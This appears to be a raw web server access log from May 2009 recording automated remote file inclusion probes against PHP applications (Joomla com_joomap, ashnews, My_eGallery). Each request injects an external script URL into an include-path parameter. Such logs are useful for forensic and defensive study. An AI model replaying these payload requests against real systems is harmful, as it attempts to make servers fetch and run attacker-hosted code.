83.206.45.1 - - [12/May/2009:03:24:52 -0400] "GET /logs/access_log.Q109042600/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:03:25:06 -0400] "GET /logs/access_log.Q109022600/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:03:25:46 -0400] "GET /logs/access_log.Q109011700/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:03:25:47 -0400] "GET /logs/error_log.Q109042600/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
217.199.222.19 - - [12/May/2009:03:26:02 -0400] "GET //?sIncPath=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:03:26:02 -0400] "GET /logs//?sIncPath=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:03:26:02 -0400] "GET /logs/access_log.Q109050200//?sIncPath=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.18.76.16 - - [12/May/2009:03:26:04 -0400] "GET /logs/access_log.Q109031600/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.199.222.19 - - [12/May/2009:03:26:20 -0400] "GET /logs/access_log.Q108110300//?sIncPath=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.34.167.192 - - [12/May/2009:03:26:20 -0400] "GET //ashnews.php?pathtoashnews=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.808"
83.206.45.1 - - [12/May/2009:03:26:24 -0400] "GET /logs/error_log.Q109022600/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
110.45.144.106 - - [12/May/2009:03:26:24 -0400] "GET /logs/access_log.Q108100900%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.206.45.1 - - [12/May/2009:03:26:32 -0400] "GET /logs/error_log.Q109011700/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
110.45.144.106 - - [12/May/2009:03:26:33 -0400] "GET /logs/access_log.Q108100900%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:26:34 -0400] "GET /logs/access_log.Q108100900%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
